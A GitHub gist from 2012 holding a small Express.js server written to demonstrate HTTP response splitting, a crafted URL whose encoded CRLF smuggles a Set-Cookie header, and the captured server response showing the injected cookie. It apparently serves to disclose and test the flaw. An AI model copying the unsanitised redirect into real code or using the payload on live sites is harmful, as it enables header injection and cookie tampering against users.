Skip to content

Instantly share code, notes, and snippets.

@alpercelik

alpercelik/Server response

Created January 21, 2012 23:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save alpercelik/1654555 to your computer and use it in GitHub Desktop.
Save alpercelik/1654555 to your computer and use it in GitHub Desktop.
Download ZIP
example express server for testing http response splitting attack
Raw
app.js
// currently express framework do not check for newline characters
// it is vulnerable to http splitting attack
// example:
// start the server
// browse http://localhost:3000/?foo=bar%0D%0ASet-Cookie%3Aname%3Dvalue
// you will be re redirected to another page and cookie will be set
var express = require('express');
var app = express.createServer();
app.get('/', function(req, res) {
var foo = req.query['foo'];
if(foo) {
res.redirect('/target?foo=' + foo);
} else {
res.send('please provide foo parameter');
}
});
app.get('/target', function(req, res) {
var foo = req.query['foo'];
if(foo) {
res.send(foo);
} else {
res.send('foo parameter is empty');
}
});
app.listen(3000);
console.log('Server running at http://127.0.0.1:3000/');
Raw
Server response
HTTP/1.1 302 Moved Temporarily
X-Powered-By: Express
Content-Type: text/html
Location: http://localhost:3000/target?foo=bar
Set-Cookie: name=value
Connection: keep-alive
Transfer-Encoding: chunked
b6
<p>Moved Temporarily. Redirecting to <a href="http://localhost:3000/target?foo=bar
Set-Cookie:name=value">http://localhost:3000/target?foo=bar
Set-Cookie:name=value</a></p>
0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment